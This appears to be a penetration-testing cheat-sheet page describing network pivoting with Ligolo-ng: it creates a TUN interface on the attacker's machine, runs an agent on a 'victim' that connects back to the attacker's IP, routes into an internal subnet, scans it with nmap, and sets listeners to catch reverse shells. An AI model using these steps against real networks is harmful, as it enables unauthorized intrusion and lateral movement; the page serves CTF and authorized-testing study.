>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Everywhere Tunnels / Ligolo-ng - TUN-based Pivoting

Ligolo-ng - TUN-based Pivoting

Everywhere Tunnels Tunneling Tools linux windows

Builds a full TUN interface on the attacker - all traffic routes natively, no Proxychains, much faster than Chisel.

Step 1 - Prepare interface on Kali

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

Step 2 - Run the proxy

./proxy -selfcert

Default port 11601.

Step 3 - Run the agent on the victim

./agent -connect 10.6.18.45:11601 -ignore-cert

Step 4 - Inside the Ligolo console: select session, route, start

session
interface_add_route --name ligolo --route 10.50.72.0/20
start

Now use any tool natively:

nmap -p 22,80,445,3389 10.50.72.30 --open -sV -Pn -sT

Listener forwarding (catch reverse shells from inside)

listener_add --addr 0.0.0.0:9091 --to 127.0.0.1:443

For HTTP file uploads:

listener_add --addr 0.0.0.0:9092 --to 127.0.0.1:80